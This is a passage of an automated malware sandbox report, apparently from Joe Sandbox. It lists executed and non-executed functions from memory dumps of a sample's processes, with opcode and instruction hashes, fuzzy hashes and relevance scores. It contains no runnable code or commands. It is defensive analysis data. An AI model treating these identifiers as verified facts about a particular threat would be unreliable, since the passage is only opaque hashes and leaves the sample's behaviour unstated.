                                • Opcode Fuzzy Hash: 2e644f0f5c94ad7c90b28055843ad4759c4834c0676539cf304d159c34df4cf3
                                • Instruction Fuzzy Hash: F3212621B1C9595FE788B76C445A77973C2FB99795F1000BAE80EC33D7DE68AC428684
                                Function 00007FF848E9116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a85082cd335a3d9e0d59c43de683c6a9fb330f4c07f104055b797d5013d92bb1
                                • Instruction ID: 11ba4b7c1e99a0e109e1996be6b7b5b17f3e7ac9220e6a2b352607d72827550f
                                • Opcode Fuzzy Hash: a85082cd335a3d9e0d59c43de683c6a9fb330f4c07f104055b797d5013d92bb1
                                • Instruction Fuzzy Hash: 6731C231A0C54A8FEB45FB68C854AF97BF0FF26340F0401BAC009D7292DB78A941CB50
                                Function 00007FF848E90C25 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction ID: 00d6a7c14118ac430a6604ed35b7cdd95eb0fb2f73c0584fd6f1d0f02ca34c5c
                                • Opcode Fuzzy Hash: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction Fuzzy Hash: 05214B36A0D649AFE716B7B8D8010EC7B60FF423A4F4881B3C0088B1D3DB78254AC799
                                Function 00007FF848E908F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: cf38bec96cb45d447ad1078e5236fba8e43c672cd2e68cf8dd23c29f6f354312
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6F01FC31F0D91D0F9568E15E944A93673C2E7C6674B191279D84FC3255DEA0AC5342C4
                                Function 00007FF848E96AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e12f965c3c972ed2c3d4695eea94a1e925d3ce87a6d7c1aba17ca46721182d80
                                • Instruction ID: 6b58dd2fa9cf644d801a6836044f24c5873409e985c57b7e9ca656748b843b00
                                • Opcode Fuzzy Hash: e12f965c3c972ed2c3d4695eea94a1e925d3ce87a6d7c1aba17ca46721182d80
                                • Instruction Fuzzy Hash: B021EB30D4852DCFDBA9EB04C495BAAB3B1FB58355F1045AAC00EA32A0DBB5ADC08B45
                                Function 00007FF848E96E49 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98c523b8f1873f0f22a0215bb4d789fa2c12d02fb302244c6824da7ca48c6758
                                • Instruction ID: a5afc071eb8ea933c79c34be485dade9cab965e5d2b751f2c38f04215e4db5f2
                                • Opcode Fuzzy Hash: 98c523b8f1873f0f22a0215bb4d789fa2c12d02fb302244c6824da7ca48c6758
                                • Instruction Fuzzy Hash: 98118620D1C509CFEBA4F698D8466F873E1FF58384F4001BAD84ED32A2EF786D40468A
                                Function 00007FF848E90C38 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Function 00007FF848E90C40 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Function 00007FF848E90C48 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Function 00007FF848E96EA1 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction ID: a3a730465b57ca93d00eb2eeaf05a0ac215576db5125c87a37cc47e96af3835d
                                • Opcode Fuzzy Hash: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction Fuzzy Hash: 1D016D3091C40ACEEFA4FA58D8957F873A0FB54344F5000BAC44EC32A2DEB82A858B09
                                Function 00007FF848E90C50 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Function 00007FF848E96FA8 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction ID: f8432b74ead5a7877dfd752adb44d66d366229f281a06000a9111252e54894ab
                                • Opcode Fuzzy Hash: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction Fuzzy Hash: 53F0302191C409CEEBA4FA98D4856F833A1FF54385F5001BAD84DD32A2DEB86E55864D
                                Function 00007FF848EA44B0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 472152e0c8be7a53c176e9b48f36c28365f3434af9b0f1ab1e774e6955e1ac18
                                • Instruction ID: f1adefaf6aa0556078b924b1ab8f3830be293ad204ff62fd240e1785d2cab6e7
                                • Opcode Fuzzy Hash: 472152e0c8be7a53c176e9b48f36c28365f3434af9b0f1ab1e774e6955e1ac18
                                • Instruction Fuzzy Hash: 45F03A34E0960B8FEB58EB98C4505FEB7B1FF44751F00463AD41AD6689DF7469408A94
                                Function 00007FF848E9526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 8BE0E531E0D0068EF760BAD8D0003BD22A5AF84388F550079D92DE72C6CF7AAC418648
                                Function 00007FF848E90B92 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction ID: 21ab46c16fe935fe7c15a2c90f176bb495fb89a0ab9f77a9ed343c6db9de258b
                                • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                • Instruction Fuzzy Hash: B5D0A73195E98B8FE785B778DC95894BFA0FF1F314B8910D6D04CC72A2E6954898C701
                                Function 00007FF848E90D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: e65d8228638dd825b5de3031fc224d67e4a94078b2cdfd46187ec1436de23706
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: A4E01234A0C20ADFE700FB94C4846AD7761FB51355F504265D41187289DBB86684C684
                                Function 00007FF848EA4CA3 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848ea0000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction ID: 3d90096790b864152a8fa73a9ee40d690075b896381298a92a5de2785ea278bc
                                • Opcode Fuzzy Hash: c0c7d8910fa8edb013cf39d84e77962b63d23f5184028abda98529c5d3d5d0f8
                                • Instruction Fuzzy Hash: 97D0C930D0C656CFEA49BA489841ABA33A1FF45789F014475EE4E83187CF78A8528A59
                                Function 00007FF848E906A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 7dfd813d5a94c95751d53650d402260dc67e6a49cb757f27893adb77e58464f3
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 68C04C06D5E52F09F455B1EE54460ECA1407FD96D8FD50172D51C404C29FED20D5415E
                                Function 00007FF848E912D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b85895e8883aa790b9a0407e17e5c415c608bc80569033a9909c8476f139b02a
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 55C08C304108088FC908FB28C88480433A0FF09204BC60090E009C7170E269DCC1C740
                                Function 00007FF848E935AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab6a8a57b66caee6214c4605b584d11e3de0dd6065e30ffc3c108e0d5c201e3d
                                • Instruction ID: b2185df6519b135608103143095ac99249d3d2633138a1f16818b18697dfa6ba
                                • Opcode Fuzzy Hash: ab6a8a57b66caee6214c4605b584d11e3de0dd6065e30ffc3c108e0d5c201e3d
                                • Instruction Fuzzy Hash: A2C08C0AE0DC2A9AF3593214042027E0402DF80788F485071E00EC72CACE5C1A0106CA
                                Function 00007FF848E906C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 381b4269f8b35b75fbeebd4794d7e36e47f11862b5f9ffc51a323fd9870811af
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 04B01201C6E40F04E41431FA08420E870407BC8188FC10070D80C4008199DD1094024A

                                Non-executed Functions

                                Function 00007FF848E909B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2538084795.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7ff848e90000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction ID: 4993736fcc240f919cad4a1a215fb278bf0b637f79f1f0cf1f8c5c920ef11074
                                • Opcode Fuzzy Hash: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction Fuzzy Hash: 66419ED2ACA9633DE10E36FDB4020F96B44EF813B9F4C9677E04C890938F59608586F9

                                Executed Functions

                                Function 00007FF848E60D48 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5[_H
                                • API String ID: 0-3279724263
                                • Opcode ID: 857ed264585acb8acd3be7e85679f6d2b8ca80278d6e1119af6c960e93cfd912
                                • Instruction ID: 356480faad0e59c4d70b65913f4975261b746bc96668863c1ef013533f96379e
                                • Opcode Fuzzy Hash: 857ed264585acb8acd3be7e85679f6d2b8ca80278d6e1119af6c960e93cfd912
                                • Instruction Fuzzy Hash: C8911675D1CA9D8FE789EF2888653A87FE0FB96354F4401BAC009E72D2EB782415C711
                                Function 00007FF848E710AF Relevance: 1.3, Instructions: 1316COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa25747f1488207cdc32a9a4e3cb8e52db905260935fdf716d4ab4155196139a
                                • Instruction ID: 497b3a07208e66b37692dd2837e71cfb5665d04c80f4cde3f49103aa1bb10b0f
                                • Opcode Fuzzy Hash: aa25747f1488207cdc32a9a4e3cb8e52db905260935fdf716d4ab4155196139a
                                • Instruction Fuzzy Hash: CC928131E1CD5A9FEA98FA2884957B873A2FF54780F5445B9D00DD3287DF38AC828B45
                                Function 00007FF848E71290 Relevance: 1.3, Instructions: 1251COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e70000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d591bbccf64f51c934b369de7dfe9ff73a8636f73afe3ccd8574d444574487ab
                                • Instruction ID: c7299aea4412aef838e85d9aa2ede55082d6055076e80d8fdded8b60db000307
                                • Opcode Fuzzy Hash: d591bbccf64f51c934b369de7dfe9ff73a8636f73afe3ccd8574d444574487ab
                                • Instruction Fuzzy Hash: C0927F21E1C95A8FEB98FA28849577873E2FF54380F5441B9D40ED32C6DF39AC828B45
                                Function 00007FF84925CAC0 Relevance: .9, Instructions: 891COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5ca9a86e73276af12991681ee3b99cfbe931284625552ed35e28d5c0b360b7b
                                • Instruction ID: ca6c363506b3795100104590dec56680dbd248178bcf1d4c2737d142af8c1159
                                • Opcode Fuzzy Hash: c5ca9a86e73276af12991681ee3b99cfbe931284625552ed35e28d5c0b360b7b
                                • Instruction Fuzzy Hash: 9B52093090D6998FEB68EF18D8459B9B7E1FF45360F1441BAD05EC7292EA34AC46CB81
                                Function 00007FF848E60940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: cN_H
                                • API String ID: 0-938979074
                                • Opcode ID: 61a347b79f7d5a47feb8a4ca4d2083f39c92df2bdfd58e0668c1ce790e61dd12
                                • Instruction ID: e90cba4aa2a40c85d8cc9223a73a8ff6acc5539193593b2898d585c93e184430
                                • Opcode Fuzzy Hash: 61a347b79f7d5a47feb8a4ca4d2083f39c92df2bdfd58e0668c1ce790e61dd12
                                • Instruction Fuzzy Hash: 9A512431A0CB044FE748EA1CE88667573E1FB99720F54057EE489C3296DE34BC4287C6
                                Function 00007FF8492538C8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: d14c799a5461ceb2409713d809b82bb6f33ff9039ab1f8c92d8ccf0d98b6be66
                                • Instruction ID: 8e577e4c856da560e1d0b9b9389293a3be23c3ba008d98b76ca23d7438b27d32
                                • Opcode Fuzzy Hash: d14c799a5461ceb2409713d809b82bb6f33ff9039ab1f8c92d8ccf0d98b6be66
                                • Instruction Fuzzy Hash: 63517831E0C59ADFEB59EFA8C4545BDB7B1FF48350F5040BAC02AE7282CA392906CB50
                                Function 00007FF849258918 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 55f4730f7daf480822bef2e343b666107510de2e4f0adde45f7b0e18435ac10d
                                • Instruction ID: 746e95cd0c73db952ec9dba927194a07797a7d095cc209a5909f715a5c323c8e
                                • Opcode Fuzzy Hash: 55f4730f7daf480822bef2e343b666107510de2e4f0adde45f7b0e18435ac10d
                                • Instruction Fuzzy Hash: 7D411330D0855E9FEB59EFA8C4949FDF7B1FF09350F1044A9C12AA7286CB786902CB51
                                Function 00007FF84925D56D Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 02#I
                                • API String ID: 0-1193908246
                                • Opcode ID: 519eb16da926aa79870c90360b0cc0552050cbf01589f4229be5d117006a3c26
                                • Instruction ID: 36fe0138a7e6ab6f0d11400e3f7be07e9980659c9ee5d24a7d17c47abafd5a04
                                • Opcode Fuzzy Hash: 519eb16da926aa79870c90360b0cc0552050cbf01589f4229be5d117006a3c26
                                • Instruction Fuzzy Hash: E0318D71A0C95A9FE758EB6CD8569B8F3E1FF44360B508239D01ED3292CF24B8528B51
                                Function 00007FF84925BBE2 Relevance: .5, Instructions: 522COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 84691ac46cd2231d81a893575801f63b84fbd38948351c8ea5db70821b96f222
                                • Instruction ID: dae85e8dc4b49d4e2c1c463a99ab533ba406ad4f44c99f4cddcdffef2275d4e5
                                • Opcode Fuzzy Hash: 84691ac46cd2231d81a893575801f63b84fbd38948351c8ea5db70821b96f222
                                • Instruction Fuzzy Hash: 03F11B35748C199FDBC8FF28D0A5E6573D2EBA8B50B114469E10FC72A6DD24EC918F81
                                Function 00007FF849258B85 Relevance: .4, Instructions: 435COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44e2d0bfb4f4e92ed5ad350c1eb7a976f5a56e1943e988961c14d624629cce6f
                                • Instruction ID: 5dce2ace88a027e8bfc13300a6dc0394f88393879f49df27fd82bb7ffe929547
                                • Opcode Fuzzy Hash: 44e2d0bfb4f4e92ed5ad350c1eb7a976f5a56e1943e988961c14d624629cce6f
                                • Instruction Fuzzy Hash: EEF1E23091D5A58FEB59DF18C4D02B4B7A1FF49360B5449FDC85A8B28BDB78E882CB41
                                Function 00007FF849254B86 Relevance: .4, Instructions: 410COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b2ee6a54bd5c96c2275147abbaf68567638038a285d899a6ee6b84eb4487194
                                • Instruction ID: 5ee10507f83649de1e8c6a2c9c19492ffe8cdb29e2208bfb0f2bf3ddcee16778
                                • Opcode Fuzzy Hash: 0b2ee6a54bd5c96c2275147abbaf68567638038a285d899a6ee6b84eb4487194
                                • Instruction Fuzzy Hash: DDD1E130A1DFA68FE369EF28D491575F7E1FF44360B1445BEC4AAC3682DE29B8428741
                                Function 00007FF849259BD1 Relevance: .4, Instructions: 410COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
